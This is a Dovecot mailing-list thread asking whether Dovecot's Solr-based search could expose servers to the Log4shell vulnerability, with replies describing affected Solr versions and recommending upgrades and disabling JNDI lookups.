Dovecot itself has no log4j vulnerability as Dovecot does not use Java or Log4j directly. Solr, however, does use log4j. Please see https://solr.apache.org/security.html#apache-solr-affected-by-apache-log4j-cve-2021-44228 for further information on upgrading or mitigating the issue.
Aki > On 14/12/2021 04:23 Scott <qm...@top-consulting.net> wrote: > > > Is this assuming you log at some verbose level ? What if you log at WARN or > higher ? > > For production it seems kind of silly to log search queries anyways. > > Scott > > -----Original Message----- > From: dovecot <dovecot-boun...@dovecot.org> On Behalf Of John Fawcett > Sent: Monday, December 13, 2021 8:52 PM > To: dovecot@dovecot.org > Subject: Re: Can dovecot be leveraged to exploit Solr/Log4shell? > > On 13/12/2021 23:43, Joseph Tam wrote: > > > > I'm surprised I haven't seen this mentioned yet. > > > > An internet red alert went out Friday on a new zero-day exploit. It is > > an input validation problem where Java's Log4j module can be > > instructed via a specially crafted string to fetch and execute code > > from a remote LDAP server. It has been designated the Log4shell exploit > > (CVE-2021-44228). > > > > Although I don't use it, I immediately thought of Solr, which provides > > some dovecot installations with search indexing. Can dovecot be made > > to pass on arbitrary loggable strings to affected versions of Solr > > (7.4.0-7.7.3, 8.0.0-8.11.0)? > > > > Those running Solr to implement Dovecot FTS should look at > > > > > > https://solr.apache.org/security.html#apache-solr-affected-by-apache-l > > og4j-cve-2021-44228 > > > > > > Joseph Tam <jtam.h...@gmail.com> > > Solr logs the search strings passed, so potentially authenticated users could > log malicious strings by searching for them. I do see escaping of some > special characters in the log, but not sure if that would be a sufficient > mitigation. In my web server logs I see all kinds of patterns that are trying > to circumvent WAF rules, so maybe someone will come up with a way of getting > the malicious string into the solr log. > > As Apache Solr is mentioned as one of the software that is impacted, the > mitigations are to upgrade to a non vulnerable version asap and in the > meantime turn off JNDI lookups. > > John > > > > > This is a private message
